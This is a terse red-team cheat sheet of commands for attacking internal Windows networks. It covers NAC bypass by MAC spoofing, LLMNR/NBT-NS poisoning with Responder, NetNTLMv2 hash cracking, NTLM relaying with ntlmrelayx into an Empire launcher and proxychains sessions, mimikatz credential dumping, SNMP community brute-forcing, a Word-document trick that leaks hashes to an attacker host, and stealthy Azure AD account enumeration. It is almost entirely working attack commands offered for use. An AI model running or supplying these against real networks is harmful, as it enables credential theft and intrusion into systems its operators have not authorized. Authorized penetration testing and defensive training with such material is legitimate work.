# Passiv network listening to identify machines# By default, it uses interactive mode (incompatible with clean output)# You can use the -P option to get off interactive
sudo netdiscover -p -i eth0
sudo netdiscover -p -i eth0 -P
# You can find the domain big using dig
dig -x IP
# If the NAC is blocking, you can listen broadcast and collect MAC address# Use printer's MAC address to bypass NAC
LLMNR / NBT-NS
# You can Man in The Middle using LLMNR and NBT-NS if they're bad configured
sudo responder -I eth0 -wFv
# If you get hashes, will be necessary to crack them
john --format=netntlmv2 --wordlist="/usr/share/wordlists/rockyou.txt" hash.txt
Responder and Multirelay
# You can link responder and multi relay to own machines# It's important to know that SMB Signing must be disabled on machines for multirelay.# SMB Server must also be off on Responder. Responder will intercept and MultiRelay will relay hashes# HTTP and SMB are OFF in Responder.conf
responder -I eth0 -rv
responder -I <interface> -r -d -w
# All captured hashes are stored and can be retrieved using the DumpHash.py script
$ sudo python DumpHash.py
# You can check for machines with disabled SMB Signing with RunFinger (impacket) or CrackMapExec
python RunFinger.py -i 10.0.2.0/24
cme smb <CIDR> --gen-relay-list targets.txt
# Then you will target one machine or one range for MultiRelay
python MultiRelay.py -t 10.0.2.4 -u ALL
ntlmrelayx.py -tf targets.txt
ntlmrelayx.py -tf targets.txt -c <insert your Empire Powershell launcher here>
# Then you can pop an interactive shell# And use for example mimikatz
mimi sekurlsa::logonpasswords
NTLM Relaying and Proxychains
# Using socks settings in case of multiple sessions to handle# you can specify a target like this all://10.1.2.10# It will target smb://’, ‘mssql://’, ‘http://’, ‘https://’, ‘imap://’, ‘imaps://’, ‘ldap://’, ‘ldaps://’ and ‘smtp://’
./ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support
# HTTP and SMB are OFF in Responder.conf
responder -I eth0 -rv
responder -I <interface> -r -d -w
# If someone connects and is relayed# You can see sessions
ntlmrelayx> socks
# To use sessions, proxychains can be set up# /etc/proxychains.conf must be pointing toward the target host# Then you can use different tools to interact# For example, connect through SMB# If password asked, whatever
proxychains smbclient //192.168.48.230/Users -U contoso/normaluser1
proxychains ./mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth
SNMP Communities
# You can use metasploit to enumerate known SNMP communities
auxiliary/scanner/snmp/snmp_enum
# OneSixtyOne is another tool
onesixtyone <target> public
# Bruteforce using a dict
onesixtyone -c wordlist <target>
# Or you can use snmp-check
snmp-check -t 192.168.1.2 -c public/private
Phishing with Responder
# Open Word -> CTRL + F9# IMPORT "\\\\Responder-IP\\1.jpg"# Right click and select "Edit Field"# Tick "Data not stored in document"# Save & close.# Open the document -> free credentials :)
Azure AD Recon
https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html
# https://login.microsoftonline.com/getuserrealm.srf?login=username@gothamlab.onmicrosoft.com&xml=1# If the NameSpaceType indicates "Managed", then the company is using Azure AD. # Discover accounts# o365creeper can be used, it does not produce logs on the AD side
https://github.com/LMGsec/o365creeper